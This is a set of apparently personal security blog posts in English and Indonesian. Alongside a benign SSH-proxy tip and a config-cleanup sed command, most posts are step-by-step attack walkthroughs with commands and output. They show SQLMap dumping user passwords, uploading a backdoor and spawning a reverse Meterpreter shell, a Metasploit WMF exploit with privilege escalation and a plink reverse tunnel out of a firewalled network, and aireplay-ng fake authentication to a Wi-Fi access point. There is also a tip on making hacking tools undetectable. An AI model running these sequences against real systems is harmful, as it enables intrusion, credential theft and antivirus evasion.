Dump Windows System Info

When you were asked to collect all Windows system information such as list of users, services, software installed and its version, Windows update history, etc..probably you wanted to see these tools:

System Information Collector

SAM/Password Extractor

Note:If you familiar with reverse engineering, make those HackTool/PUA undetectable is the best choice 😀


Using Metasploit and attack your target system. Meterpreter payload contains lot of user scripts that can be useful to dig system info. I suggest the attack against Internet Explorer since it may not harm the system/service running.

J. Dravet wrote various techniques in order to retrieve the passwords, and of course it depends on your goal, use it wisely.

Good luck 🙂

Remove Comments from Configuration

Sometimes when you want to config something, it contains the comments from the developer which will help us to figured out which options of arguments will be used. But if you are already familiar with the configuration, comments are so annoying, so here is how to eliminate them (using apache2.conf as example):

sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//' /etc/apache2/apache2.conf | more

or write it to a file:

sed '1p; /^[[:blank:]]*#/d; s/[[:blank:]][[:blank:]]*#.*//' /etc/apache2/apache2.conf > /etc/apache2/apache2.conf.nocomments

Use it with caution, always review it. You’ve been warned!

How to: SQLMap (dump and destroy)

SQLMap is the tool to automate SQL Injection vulnerability exploitation. This tool is very popular to exploit the SQL Injection vulnerability. While most of web hacker enthusiast knew about this tool to gather information and retrieves the tables information, i try to share this information about the powerful of SQLMap rather than just as “a database dumper tool”.

I will separate this in 3 section, as a fingerprinter (we already knew this), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out.


root@bt:/pentest/database/sqlmap# ./sqlmap.py --url ""

sqlmap/0.9-dev - automatic SQL injection and database takeover tool

[*] starting at: 22:26:52

[22:26:52] [INFO] using '/pentest/database/sqlmap/output/' as session file
[22:26:52] [INFO] resuming match ratio '0.972' from session file
[22:26:52] [INFO] resuming injection point 'GET' from session file
[22:26:52] [INFO] resuming injection parameter 'id' from session file
[22:26:52] [INFO] resuming injection type 'numeric' from session file
[22:26:52] [INFO] resuming 0 number of parenthesis from session file
[22:26:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:26:52] [INFO] resuming remote absolute path of temporary files directory 'C:/WINDOWS/Temp' from session file
[22:26:52] [INFO] testing connection to the target url
[22:26:52] [INFO] testing for parenthesis on injectable parameter
[22:26:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5

[*] shutting down at: 22:26:52

Yes, we knew this at all. Dump the database engine, the version, and the operating system information.

Enumerate Database

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "" --dbs


[22:28:41] [INFO] fetching database names
[22:28:41] [INFO] fetching number of databases
[22:28:41] [INFO] retrieved: 6
[22:28:41] [INFO] retrieved: information_schema
[22:28:44] [INFO] retrieved: cdcol
[22:28:45] [INFO] retrieved: mysql
[22:28:46] [INFO] retrieved: phpmyadmin
[22:28:47] [INFO] retrieved: test
[22:28:48] [INFO] retrieved: webappdb
available databases [6]:
[*] cdcol
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] webappdb

Dump the database, yes..SQLMap always do the great stuff!

Enumerate tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "" -D webappdb --tables

[22:32:32] [INFO] fetching tables for database 'webappdb'
[22:32:32] [INFO] fetching number of tables for database 'webappdb'
[22:32:32] [INFO] retrieved: 2
[22:32:33] [INFO] retrieved: guestbook
[22:32:34] [INFO] retrieved: users
Database: webappdb
[2 tables]
| guestbook |
| users     |

Dump the tables

[22:36:54] [INFO] fetching columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 4
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': id
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': name
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': country
[22:36:54] [INFO] fetching entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 1
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': admin
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 123456
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 2
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': secret
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': SG
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': backup
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/': backup12
Database: webappdb
Table: users
[3 entries]
| country | id | name   | password |
| ID      | 1  | admin  | 123456   |
| ID      | 2  | secret | password |
| SG      | 3  | backup | backup12 |

[22:36:54] [INFO] Table 'webappdb.users' dumped to CSV file '/pentest/database/sqlmap/output/'
[22:36:54] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/'

[*] shutting down at: 22:36:54

SQLMap do a great job so far 🙂 Next, take over the system!!

Remote Command Execution

root@bt:/pentest/database/sqlmap#./sqlmap.py --url "" --os-shell

[22:51:25] [INFO] trying to upload the uploader agent

which web application language does the web server support?

[1] ASP (default)
[2] PHP
[3] JSP
[22:51:27] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[22:51:28] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]:
[22:51:28] [INFO] the uploader agent has been successfully uploaded on 'C:/xampp/htdocs/' ('')
[22:51:28] [INFO] the backdoor has probably been successfully uploaded on 'C:/xampp/htdocs/', go with your browser to '' and enjoy it!
[22:51:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
>2 ipconfig
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . :
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :

The Metasploit’s Meterpreter over SQL Injection

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "" --msf-path=/opt/metasploit3/msf3 --os-pwn

This time, SQLMap will upload an php file contain shell_exec in order to execute arbitrary command to the remote system via php. After uploaded, SQLMap will trigger the msfpayload (Metasploit Payload) to build “portable executable” meterpreter backdoor. It will be encoded and uploaded via php shell.

When uploaded, SQLMap will trigger “Metasploit listener” called Multi/handler and waiting for the “portable exe backdoor” to be executed. After it executed, the meterpreter shell will come up 🙂
I will skip some information here, because it is too long to be dropped here.
—-the process before this line was creating the php shell and upload to document root—–
[22:57:05] [INFO] creating Metasploit Framework 3 payload stager
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection

which is the local address? []
which local port number do you want to use? [31503]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
> 11
[22:57:46] [INFO] creation in progress ................ done
[22:58:03] [INFO] compression in progress . done
[22:58:04] [INFO] uploading payload stager to 'C:/xampp/htdocs/tmpmtonj.exe'
[22:58:04] [INFO] running Metasploit Framework 3 command line interface locally, wait..
[*] Please wait while we load the module tree...
[*] Started reverse handler on
[*] Starting the payload handler...
[22:58:27] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
[*] Sending stage (748544 bytes) to
[*] Meterpreter session 1 opened ( ->
meterpreter> Loading extension espia...success.
meterpreter> Loading extension incognito...success.
meterpreter> Loading extension priv...success.
meterpreter> Loading extension sniffer...success.
meterpreter> Computer: XP_FDCC
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter> Server username: NT AUTHORITYSYSTEM

meterpreter> shell
Process 3128 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


OS Pwned!

PHP Include Exploitation with Metasploit

Metasploit support for PHP Include exploitation, or simply known as RFI (Remote File Inclusion). I will show you how this work on CS-Cart 1.3.3 which vulnerable to remote file inclusion.

The vulnerable path is at classes/phpmailer/class.cs_phpmailer.php?classes_dir=[include arbitrary php code]

so in Metasploit, the PHPURI PATH will be like this:


let see how this exploitation works.


Secure Browsing Dengan SSH Tunnel

Tehnik ini saya gunakan ketika memakai akses internet di area publik seperti Wireless Hotspot. Yup, secure browsing kali ini menggunakan SSH Tunnel. Tehnik yang menarik karena SSH bisa “ditebengin” dengan paket lain, sehingga paket yang “nebeng” protokol SSH juga ikut terenkripsi (SSH merupakan protokol yang aman karena tiap paket yang berjalan di enkripsi).

Ok basa-basi selesai, pertama kali yang harus disiapkan adalah sebuah server di internet yang bisa kita SSH (maksudnya, bisa kita remote dengan SSH) contohnya server VPS kita, atau mungkin server standalone milik sendiri di rumah (bisa pake Speedy, atau ISP lain yang menyediakan IP Public). Kali ini saya menggunakan server standalone yang ada di rumah dan sudah menjalankan SSH server. Kalau sudah, berikutnya bisa dipaparkan dalam bentuk step-by-step.

Kedua, silakan SSH server kita yang dengan perintah seperti berikut:

toms@bt:~$ ssh t0m@111.222.333.444 -D 8080
t0m's password:
Linux sucks 2.6.26-2-686 #1 SMP Tue Mar 9 17:35:51 UTC 2010 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

Last login: Fri Apr 23 11:50:00 2010 from

Perhatikan perintah SSH yang saya gunakan, ada tambahan -D 8080 disana. -D 8080 berarti membuka port 8080 di sisi lokal (localhost) yang nantinya apabila ada paket yang melewati port 8080 di localhost tersebut akan ikut terenkripsi seperti halnya koneksi ke port 22 untuk SSH. Istilah gampangnya, apapun yang lewat port 8080 di localhost “ditebengin” ke port 22 yang notabene terenkripsi.

Sebelum ke tahap selanjutnya, coba browsing ke IP Chicken untuk melihat IP Address kita saat ini, tujuannya biar nanti kita tahu apakah tehnik ini berhasil atau tidak.

Tahap ketiga, konfigurasikan browser kita untuk menggunakan proxy socks5 dan arahkan ke dan port 8080.

Ok klo udah, coba browse lagi ke IP Chicken dan lihat perbedaannya. Apabila IP address yang keluar adalah IP server SSH kita, berarti secure browsing lewat SSH Tunnel berhasil dilakukan.

Tehnik ini sangat berguna apabila kita mau mengakses website yang membutuhkan transaksi terhadap informasi sensitif menggunakan browser, seperti login ke email (kantor/pribadi), login ke social network website seperti Facebook, Twitter, ataupun melakukan transaksi di Paypal, eBay, Amazon.

Tehnik Tunneling Dalam Hacking

Tunneling biasanya dipakai sebagai tehnik untuk meloloskan paket dari jaringan yang terisolasi oleh firewall atau oleh jaringan itu sendiri (NAT). Para administrator jaringan biasanya membuat sebuah tunnel untuk dapat mengakses bagian yang tidak dapat diakses tersebut. Bayangkan jika Anda seorang administrator jaringan hendak melakukan remote connection ke jaringan Anda sendiri namun komputer yang hendak Anda remote berada di balik NAT / jaringan yang tidak di routing ke internet, bagaimana melakukannya? Tentu saja dengan tehnik tunneling.

Tehnik tunneling juga dipakai oleh pentester untuk mendukung pekerjaan penetration test. Mari kita lihat tehnik ini berjalan.
Sebagai seorang pentester, saya ditugaskan untuk menjebol sistem sampe tuntas, termasuk jaringan internal target. Singkat cerita, saya telah mendapatkan remote shell dari sebuah komputer yang hanya dapat diakses dari satu subnet jaringan. Setelah ditelusuri, komputer target membuka port 3389 yang artinya service Remote Desktop sedang berjalan dan siap diakses. Namun karena komputer target berada pada jaringan NAT, maka koneksi langsung ke port 3389 akan segera diblok oleh Gateway/Firewall. Saya mencoba koneksi reverse connect dengan netcat, namun yang menjadi penghalang, ternyata OUTBOUND rule pada firewall hanya memperbolehkan koneksi ke port 80 dan 443, selain itu di blok. Untuk itulah saya terpikir untuk menggunakan SSH Tunneling, sebuah server SSH saya siapkan untuk listening di port 80. OIya, saya menggunakan Backtrack untuk melakukan ini semua 🙂

Eksploitasi sukses dilakukan dengan Metasploit dengan sedikit metode Social engineering terhadap salah satu staff di perusahaan tersebut. Metasploit memberikan saya sebuah remote back shell meterpreter yang multifungsi.

msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[*] Started reverse handler on
[*] Using URL:
[*] Server started.
[*] Sending exploit to
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened ( ->
msf exploit(ms06_001_wmf_setabortproc) > sessions -l
Active sessions
  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter ->
msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: ITUSR-54\admin
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Setelah mendapatkan akses setara dengan SYSTEM, saya mengupload ssh client yang terdapat dalam paket Putty, yaitu plink.exe.

meterpreter > upload /pentest/windows-binaries/tools/plink.exe C:\\windows\
[*] uploading  : /pentest/windows-binaries/tools/plink.exe -> C:\\windows\
[*] uploaded   : /pentest/windows-binaries/tools/plink.exe -> C:\windows\
meterpreter >

Setelah itu saya mengakses shell pada target, dan mengeksekusi SSH client untuk segera membuat tunneling ke server SSH yang telah saya siapkan sebelumnya.

meterpreter > execute -f cmd -c -H
Process 1776 created.
Channel 2 created.
meterpreter > interact 2
Interacting with channel 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\admin\Desktop>plink -P 80 -l root -pw toor -C -R 3389:
plink -P 80 -l root -pw toor -C -R 3389:
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's key fingerprint is:
ssh-rsa 2048 ce:bf:86:ed:50:68:bf:21:8f:c2:a9:63:9f:07:d5:0c
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
Store key in cache? (y/n) y
BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution
Last login: Wed Feb 24 23:04:29 2010 from

Terlihat bahwa koneksi SSH telah terbentuk (pada port 80) antara target dengan komputer saya, ditandai dengan keluarnya shell Backtrack saya pada komputer target. Pada komputer saya, juga segera terbentuk port 3389 yang listening di (localhost). Sampai saat ini, port 3389 service Remote Desktop komputer target telah berhasil di tunneling ke komputer saya dengan port yang sama, namun melewati koneksi SSH.

tom@bt:/$ rdesktop
Autoselected keyboard map en-us
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Tehnik tunneling sangat berguna untuk berbagai keadaan, salah satunya adalah situasi diatas.

How-to: Backtrack 4 USB Persistent Changes

Here is my dirty way to make BT4 running on USB disk instead of run from DVD.

    1. Boot Live DVD Backtrack 4
    2. Split your pendrive into 2 partitions, the 1st is for your BT4 files, and the 2nd is for your changes. I have 4 GB pendrive, so i made 2 partitions with 1500MB for BT4 files (with FAT32 FS) and the rest of disk space went to another partition with Ext3 FS. You can use fdisk of cfdisk to make those things.
    3. Format it using mkfs:
      • mkfs.vfat -F 32 -n BT4 /dev/sdb1
      • mkfs.ext3 -b 4096 -L casper-rw /dev/sdb2
    4. Mount them:
      • mkdir /mnt/BT4
      • mount /dev/sdb1 /mnt/BT4
    5. Copy all BT4 files from mounted DVD to our new mounted partition (/mnt/BT4)
      • rsync -avh /media/cdrom/ /mnt/BT4/
    6. Instal GRUB boot loader
      • grub-install –no-floppy –root-directory=/mnt/BT4 /dev/sdb
    7. Edit the menu.lst file
      • nano /mnt/BT4/boot/grub/menu.lst
      • Start Persistent Live CD <———- find this line
      • bla bla bla quiet vga=0×317 <———- add vga=0×317 like this
    8. umount /mnt/BT4
    9. reboot

That’s it. Can’t wait for the official release ^^

Failed Injection Packet to AP

Pernah ketemu kasus seperti ini ketika lagi asik-asiknya menginjeksi paket di jaringan wireless?

Saving ARP requests in replay_arp-0123-104950.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 17915 packets (got 3 ARP requests), sent 5854 packets...

Yup, kasus tersebut terjadi karena alamat MAC korban tidak lagi berasosiasi dengan Access Point setempat atau bisa dibilang lagi putus-putus, entah akibat proses de-authentication yang kita buat sendiri atau memang sinyalnya ga bagus untuk sampai di laptop/pc korban. Nah, untuk menyiasatinya ada 3 cara:

  1. Ganti dengan alamat MAC korban yang lain.
  2. Pancing dengan 1 kartu jaringan wireless lain (musti ada 2 buah kartu jaringan)
  3. Bikin fake authentication ke AP

Untuk cara yang pertama cukup mudah, tinggal matikan proses aireplay-ng yang sedang berjalan, lalu ganti dengan alamat MAC korban yang tergabung dalam satu AP yang sama. Pada cara yang kedua, kita tinggal menghidupkan kartu jaringan yang kedua (biasanya PCMCIA/USB card) lalu kirimkan paket ke AP atau cukup dengan mengirimkan ping ke internet. Yang mau saya bahas disini adalah cara ketiga, yaitu dengan membuat fake authentication ke AP, caranya:

aireplay-ng -1 0 -e  -a  -h  wifi0
aireplay-ng -1 0 -e linksys -a 00:18:F8:E1:76:BD -h 00:0F:54:3C:65:93 wifi0
Kalau sukses akan terlihat seperti ini:
18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Atau dengan cara lain untuk keep-alive packet injection seperti ini:

aireplay-ng -1 6000 -o 1 -q 10 -e linksys -a 00:18:F8:E1:76:BD
-h 00:0F:54:3C:65:93 wifi0

yang berarti:

  • 6000 – Melakukan re-autentikasi setiap 6000 detik.
  • -o 1 – Hanya mengirim satu paket untuk satu waktu.
  • -q 10 – Mengirim paket keep-alive setiap 10 detik.

hasilnya akan seperti ini:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# dan seterusnya.

Selanjutnya kita bisa melanjutkan proses injeksi paket di jaringan wireless tersebut dengan santai ^^